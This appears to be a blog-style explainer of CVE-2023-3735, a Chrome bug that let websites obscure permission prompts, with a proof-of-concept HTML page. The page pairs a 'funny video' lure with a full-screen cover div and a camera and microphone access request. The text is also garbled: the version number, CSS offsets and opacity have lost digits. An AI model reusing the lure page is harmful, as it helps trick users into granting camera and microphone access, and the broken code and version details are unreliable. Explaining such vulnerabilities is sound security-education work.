When it comes to online security, what you see really does matter. Chrome tries to warn you and put decisions in your hands, but what if the browser gets tricked into hiding those warnings? Today we'll explore CVE-2023-3735—an interesting vulnerability in Google Chrome that let crafty websites make permission prompts less visible to users, simply by clever use of HTML.
Let's break it down in simple terms, look at the exploit, and see how it was fixed.
The Issue: *Security Prompts in Disguise*
Permission prompts—like “Allow this site to access your camera?”—are standard in Chrome. They're supposed to be obvious overlays, so users know who's asking for what. But, in Chrome versions before 115..579.98, websites could embed content or style pages in such a way that these prompts got hidden, moved, or disguised. The technical term? UI Obfuscation.
This meant you might not see, or correctly understand, when a site wanted microphone, camera, or other sensitive access.
How the Exploit Works
Here’s a walk-through using HTML and JavaScript that exploits the vulnerability, based on what was reported:
Step 1: Create a deceptive HTML page
The attacker builds a page that loads an iframe or uses tricky CSS to overlay content or visually distract from the permission prompt.
<!DOCTYPE html>
<html>
<head>
<title>Fake Content</title>
<style>
/* Overlay div to obscure Chrome permission prompt */
.cover {
position: fixed;
top: ; left: ;
right: ; bottom: ;
background: white;
z-index: 99999;
opacity: .98;
}
</style>
</head>
<body>
<h2>Watch this funny video!</h2>
<div class="cover"></div>
<script>
// Request camera or mic access
navigator.mediaDevices.getUserMedia({video: true, audio: true})
.then(stream => {
// Success! Permission was granted
})
.catch(err => {
// User denied, do nothing
});
</script>
</body>
</html>
In this snippet
- The .cover div is visually blocking the permission prompt from the user’s view, either partly or fully.
Step 2: The User is Fooled
Any pop-up from Chrome is now partially or fully hidden. The user might click “Allow” thinking they’re dismissing a newsletter signup or cookie notice, when really they’re giving access to their camera or microphone.
Related Links & References
- Chromium Issue 1464075 (Monorail) – Technical discussion and patch.
- Chromium Release Notes (115..579.98)
- NVD CVE-2023-3735 Record
Severity and Fix
Google rated this vulnerability as Medium severity. Why? Because it doesn't let attackers directly break into your computer, but it does risk tricking you into saying “yes” to things you’d normally say “no” to.
The fix? Starting with Chrome 115..579.98, permission prompts are now shown in a way that's much harder (or impossible) to visually obscure with layered HTML. Chrome changed how prompts get layered and drawn, making them immune to this "tapjacking" trick.
Conclusion
CVE-2023-3735 is a great example of how even big browsers have to watch out for the little tricks. By just using clever HTML, attackers could make permission prompts disappear, and users might do something they regret. This reminds us that good security relies not just on code, but on making sure users can *see* and *understand* what’s going on.
Stay updated, stay alert!
*If you're a coder or researcher, always check the latest release notes and Chromium's security blog. Find the details in the references above to dig deeper!*
Timeline
Published on: 08/01/2023 23:15:00 UTC
Last modified on: 08/12/2023 06:18:00 UTC